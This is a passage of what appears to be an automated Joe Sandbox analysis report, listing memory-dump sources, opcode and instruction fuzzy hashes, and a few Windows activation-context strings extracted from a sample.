                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5e97d93a027cc2d6942324c2e716f2b86a65817e962a7fac494f86773670c168
                • Instruction ID: fd119c283d5b42a6398d433d69c81eb706f32c2393751b20fc9c25af1cb9debc
                • Opcode Fuzzy Hash: 5e97d93a027cc2d6942324c2e716f2b86a65817e962a7fac494f86773670c168
                • Instruction Fuzzy Hash: DD118E36241641EFDB15AF1AC990F167BB8FF64B44F11006AEA059B771D235ED01CA90
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4140a07296e1277fcd799afd07221b3a5585c834f82ba050e4f7bd813d12ed4d
                • Instruction ID: 23573d37a9d1c5370631791b8ee4f171543f0ac38ab1953fd3541dd49f2c3c3a
                • Opcode Fuzzy Hash: 4140a07296e1277fcd799afd07221b3a5585c834f82ba050e4f7bd813d12ed4d
                • Instruction Fuzzy Hash: 94119E71501218ABDB65AF25CC42FE97274AB14710F5041DAA318A61F0DAB09E81CF84
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 040a9646fe21015e004a8fd5cca03e87bf6c319d9f72dda8b8a038081431a8c0
                • Instruction ID: dd993012c056434ac13bd881c38071767b83b9f91c7edd56662d2537e1b3dec0
                • Opcode Fuzzy Hash: 040a9646fe21015e004a8fd5cca03e87bf6c319d9f72dda8b8a038081431a8c0
                • Instruction Fuzzy Hash: 39111772900019ABCF12DB95CC90DDFBBBCEF58354F054166A906A7211EA34AA15CBE0
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                • Instruction ID: 8d8da3dfd52d0150f1456baf8bfb9ab7fe6985bc66f02d403db980f1f7405529
                • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                • Instruction Fuzzy Hash: 5101F5726001019BEF21AE6DD880E5777A6BFD5600F5541ABEE028F366EAB1C883C390
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                • Instruction ID: 21eb078f0101f82ca7d447309d25b0b2b29e517d68dadf04b722f8ddb5d86e8f
                • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                • Instruction Fuzzy Hash: 7C012D325007469FEF23D6AAD450EA777E9FFD6210F44441FE5468B660DA70E402C790
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c2bd63d690f490ce5989bbfc7e1eba06d004d2d7106c8de8e9d68b4b29468899
                • Instruction ID: 68864ddd5aea4c0d3e84499f715570fc392be9334387df39e8ea820514e5d480
                • Opcode Fuzzy Hash: c2bd63d690f490ce5989bbfc7e1eba06d004d2d7106c8de8e9d68b4b29468899
                • Instruction Fuzzy Hash: 2111AD39A0020DAFDB01DFA4C950EAE7BB5EB94740F00405EEA059B3A0DA70AE01CB90
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                • Instruction ID: 3d5ccf2dd781c9e956a59741fae2736afebdb336f820c86228c7b09df39790f0
                • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                • Instruction Fuzzy Hash: 8F01BC72200580DFEB22C61DC918F377BD8EB49784F0900A2F905DB7B2EA38DC41C221
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2780f96f94cd2e69cad9d02b3be879c54a5f442fb4eb2e2dc91c67e0f36d1839
                • Instruction ID: 96640e06fd6433b9cf512ffd0f2c83d47aeb22934a6e88ca007c8d06581e71be
                • Opcode Fuzzy Hash: 2780f96f94cd2e69cad9d02b3be879c54a5f442fb4eb2e2dc91c67e0f36d1839
                • Instruction Fuzzy Hash: 3401A731700906DFD724DBAAEC599EF7BB9FF90620B15402B9901AB7A4EE30DD05C691
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                • Instruction ID: 08757ef29626ff1df231de64dc79f72fdfa83e9dc7b2085779a7f9c96ae99f73
                • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                • Instruction Fuzzy Hash: 2EF0C8F2600611ABD724CF4EDC40E57FBEADBE1A90F05812DA545C7320E631DD04CB50
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 48d6d037de5fe43afbe853bcb60df21d62c02e3313b99963eab30e46d4dfebd2
                • Instruction ID: 59f1034a3d0e73d63234cb297fe69237378c0179ea26f6dd5cf218d5760ccd16
                • Opcode Fuzzy Hash: 48d6d037de5fe43afbe853bcb60df21d62c02e3313b99963eab30e46d4dfebd2
                • Instruction Fuzzy Hash: B5018F75A10249EFDB00DFAAE551AAEBBF8FF58700F11402EF900EB350D6349A018BA0
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                • Instruction ID: 7bb53268af38ddc2d74877c75b985211f5b29a2c97d72f17268e203fb6ed4a9c
                • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                • Instruction Fuzzy Hash: A0F0FC73204A239BD7321BEA58C0BBBA9958FE1A64F19003BE609AB260C9748D0256D0
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b22f2ae3cfa8614d799f59c01705a4c0019c5bfc649e63e05f3011663a696802
                • Instruction ID: ba6dfd0bf39f2b2b4db985e81e77d0e7bfeb8d34f4f3c5a218938b2e8ec8bd22
                • Opcode Fuzzy Hash: b22f2ae3cfa8614d799f59c01705a4c0019c5bfc649e63e05f3011663a696802
                • Instruction Fuzzy Hash: 71018471A00249EFCB04DFA9D4519AEB7F8FF58740F10401BF900EB350D6749901CBA0
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9208af5f87523d114eb8291a7f1654779e15eed4729d3f6c337729e2ef5535b6
                • Instruction ID: aab3402077f49f9f1cc3a94742bd73af57b6f75d3b9e010f4c35f3077406a5ce
                • Opcode Fuzzy Hash: 9208af5f87523d114eb8291a7f1654779e15eed4729d3f6c337729e2ef5535b6
                • Instruction Fuzzy Hash: E1018471A00209EFDB00DFA9D45199EBBF8FF58700F51401AF910EB351D6749D018BA0
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f4517a210a67e6a2f4c7e1e24dd8d6207c89ead78caa923006fc3e5676e3d8d3
                • Instruction ID: a276e3eb480b178247183cfba1d69ab0d18af54e2a098275df8f3ebfc5ea14b6
                • Opcode Fuzzy Hash: f4517a210a67e6a2f4c7e1e24dd8d6207c89ead78caa923006fc3e5676e3d8d3
                • Instruction Fuzzy Hash: CB018F71A002499FDB00DFAAD851AEEBBF8BF58710F14405EE900AB290D734EA01CB94
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                • Instruction ID: b9f422edaa225585aa09c49a740388c54b4ca476ae6814585d3558e73c26c298
                • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                • Instruction Fuzzy Hash: D4F01D7220001EBFEF029F95DD80DAF7B7EFB69298B154129FA1196160D631DD21ABA0
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 911ba3b91ce56b35978f4fe31285ce129b24d459a2029f3e97df25611e3161c6
                • Instruction ID: da9865cc98091874cdb7e4c4b39328489b8e85b90165032ffa747012ecaf8dbe
                • Opcode Fuzzy Hash: 911ba3b91ce56b35978f4fe31285ce129b24d459a2029f3e97df25611e3161c6
                • Instruction Fuzzy Hash: BDF024723042425BF7509619AC91FA3379AE7D0656F65803BEB058B7F2FA70DC01CB94
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                • Instruction ID: 723bca061bcdcf5527e76dd56e4a5e42e385b1970e3e52e8918934684539df27
                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                • Instruction Fuzzy Hash: B4F0B43334193347EB36AA2EC420B2EAA95BFF1910B25052DD602CF6D0DF20D8808790
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 32f0793f388a7a29f20e1edb8894a4ea0d9f213716ac0cc84ee45296cac9d42b
                • Instruction ID: 13847cd900a590e240cc719ed2a688a39bbd68d9284600023fa5dd075360bfac
                • Opcode Fuzzy Hash: 32f0793f388a7a29f20e1edb8894a4ea0d9f213716ac0cc84ee45296cac9d42b
                • Instruction Fuzzy Hash: BFF02776419AC24BDF326F3C7C562E96B64B7C1018F2A2449D5B25F245C6748487D320
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                • Instruction ID: 5813d6a545abb6f4ba37b362cef92af1cd643f11f9f4aa2f7c3e86fc2f55c607
                • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                • Instruction Fuzzy Hash: 30F08C721002049FF7229F0AD844B52BBF8FB15364F02C02AE6088F160D3BAEC40CBA0
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c3b2f99b725cbdb0bd9460f34d434014dac2ddc347b17df55aaa197e02e5e2e9
                • Instruction ID: 67cab48c9bf18926992a4e16139073aea19fe00e332344ee9873c0d0754b4571
                • Opcode Fuzzy Hash: c3b2f99b725cbdb0bd9460f34d434014dac2ddc347b17df55aaa197e02e5e2e9
                • Instruction Fuzzy Hash: 2AF06531A256924FE7F2D72CD564B5D77E4BB50A30F1A4557DC058F912E724DCC0C650
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                • Instruction ID: eadd2ee4abef28235447f1e9e8286e9cfd70197ec56b99bbce83dbe0eb863654
                • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                • Instruction Fuzzy Hash: BCE0C2343003068FE716CF59C050B667BB6BFD5A10F28C068AA488F245EB32E842CB40
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                • Instruction ID: 973c77a87318bcd9ad6bc5299c8513df03a86ec97e3ade39f42f4eedd724bb5e
                • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                • Instruction Fuzzy Hash: DEE08631500912DEDB312F16DC14F9276A1FB64B11F11482FE0450547486B05C82CA44
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9b229294d14852f3c82efa9381d9e504b72156b74d4dfc5be2ab402795c68c0c
                • Instruction ID: 44c5b51f31f00419a9a0a46d845bd7ce866b781ec2b63c5257ebb59ac14eb3ba
                • Opcode Fuzzy Hash: 9b229294d14852f3c82efa9381d9e504b72156b74d4dfc5be2ab402795c68c0c
                • Instruction Fuzzy Hash: 0EE0C233100890ABC721FF6EED01F4E779EEFB5260F05012AF5559B2A0CA70AD00C794
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                • Instruction ID: cc8246c7bf04ba1944ad5883977b50e862d92cb030b12bd39ac9f351616a85f2
                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                • Instruction Fuzzy Hash: 9CD022332130B093DF295A666800FAB6D05EB81A90F2E002E340AD3920C0248C43C2E0
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                • Instruction ID: 1ac9a584a3c52fe4e34aa96e0359a35843a6466821edfe8608c3defb4ae41180
                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                • Instruction Fuzzy Hash: C8D01236100248EFCB01DF41C890D9A772AFBE8710F508019FD19076108A31ED62DB50
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a38e0dc308c7595fc351d15e3c24923209e0e6f5d6df8dd96949f99a38008ee9
                • Instruction ID: a8d10d5cf307e01e08afaefe5b22acf754c74356c469969323598dafdaf69443
                • Opcode Fuzzy Hash: a38e0dc308c7595fc351d15e3c24923209e0e6f5d6df8dd96949f99a38008ee9
                • Instruction Fuzzy Hash: CC900235605811129540715848945564015A7F0301B55C012E0424565CCB248A565362
                Strings
                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 014E7AE6
                • RtlpFindActivationContextSection_CheckParameters, xrefs: 014E79D0, 014E79F5
                • SsHd, xrefs: 0149A3E4
                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014E79D5
                • Actx , xrefs: 014E7A0C, 014E7A73
                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014E79FA
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
                • Associated: 00000004.00000002.2549746722.0000000001579000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.000000000157D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.2549746722.00000000015EE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_1450000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                • API String ID: 0-1988757188
                • Opcode ID: d8f2f68ff71df4ca4d82131b40f9b501ba73f601967035ef0e51bd7bdff3d09e
                • Instruction ID: c38ec2509712e78b65dbeaba078e6982fc2081c288f9d5fe517e6490b407373c
                • Opcode Fuzzy Hash: d8f2f68ff71df4ca4d82131b40f9b501ba73f601967035ef0e51bd7bdff3d09e
                • Instruction Fuzzy Hash: 56E1A4716043028FEB25CE68C488B6B7FE1BB84365F244A2FE995CB3A1D731D945CB91
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, Offset: 01450000, based on PE: true
